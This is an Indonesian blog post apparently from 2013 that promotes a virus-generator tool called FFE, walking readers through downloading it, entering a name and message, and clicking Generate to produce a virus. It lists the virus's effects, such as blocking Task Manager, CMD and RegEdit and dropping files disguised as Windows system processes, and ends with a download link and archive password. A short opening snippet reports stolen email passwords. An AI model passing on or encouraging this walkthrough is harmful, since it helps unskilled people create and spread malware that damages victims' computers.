Dari pantauan VIVAnews, 10 Agustus 2011, terdapat 109 alamat email dan password yang berhasil diambil oleh hacker dari situs tersebut.
selengkapnya baca di : SINI

Surat Ancaman Anonymous Untuk Pemerintah Amerika



Rabu, 06 Februari 2013

Cara Mudah Membuat Virus, Dengan 10 Detik!!

Apakah komputer atau Laptop anda sering terserang virus?? Pasti bosan jika setiap hari anda harus membersihkan semua virus yang ada di laptop anda. Pernahkah terfikir di benak anda untuk membuat virus sendiri?

Ehhmmm…memang tidak mudah untuk membuat sebuah virus karena diwajibkan untuk mengetahui dan menguasai Bahasa Pemrograman terlebih dahulu. Tapi jangan khawatir karena kali ini tim kreatif Java Creativity akan berbagi trik cara membuat virus instan tanpa harus menguasai Bahasa Pemrograman.

Yah….dengan memanfaatkan software yang bernama FFE (Fast Firus Engine) maka anda dapat membuat virus hanya dalam waktu 10 detik saja.

FFE merupakan sebuah software virus generator. Software ini dibuat menggunakan bahasa Visual Basic. Gunanya software ini adalah untuk membuat virus baru tanpa harus menulisakan koding yang sangat banyak dan rumit. Tinggal masukan nama author, nama virus, dan pesan yang diinginkan lalu klik Generate maka dengan cepat akan terciptalah sebuah virus baru. Virus yang tercipta oleh FFE mempunyai ukuran 55 kb. Virus yang tercipta tergolong tidak terlalu berbahaya karena virus tersebut tidak menghapus data para korbannya. Berikut saya berikan cara pemakaian software FFE ini :

  • Silakan Download terlebih dahulu FFE pada link yang sudah tersedia di bawah
  • Jika sudah, silakan Ekstrak dan jalankan software FFE tersebut
  • Lalu muncul form awal berupa splash screen

  • Lalu klik form tersebut, kemudian form utama akan terbuka.
  • Isi nama author, nama virus, dan pesan lalu klik generate maka sebuah virus barupun akan tercipta dengan mudahnya

  • Jika muncul Kotak Dialog Peringatan seperti berikut, klik saja OK

  • Virus yang anda buat akan diletakkan di dalam folder FFE dengan nama “firus”

Virus tersebut apabila anda jalankan maka akan menyebabkan komputer terasa lebih lambat, karena resource komputer kita dipakai oleh virus tersebut. Ciri-ciri virus terbut adalah

  • Mempunyai ukuran 55 kb
  • Tidak bisa membuka Task Manaer
  • Tidak bisa membuka CMD
  • Tidak bisa membuka RegEdit
  • Tidak bisa membuka MsConfig
  • Find hilang
Virus tersebut juga akan memberikan atribut System dan hidden pada folder Windows. Selain itu virus ini juga akan menciptakan file Windows.exe dan baca euy.txt pada drive c:\. lsass.exe, smss.exe, svchost.exe, winlogon.exe, csrss.exe pada folder c:\Windows\System. Win32.exe, setan binal.exe, ActiveX.exe, .exe pada folder c:\Windows. _default.pif serta copy.pif pada folder c:\Windows\System32. File Setan Binal.exe bisa berbeda-beda tergantung nama virus yang kita buat menggunakan FFE.


Tunggu apa lagi!! Silakan Sedot FFE pada link di bawah ini.


Download FFE Disini

Password : www.javacreativity.com

Mohon gunakan secara bijak!!

Tetap Semangat!!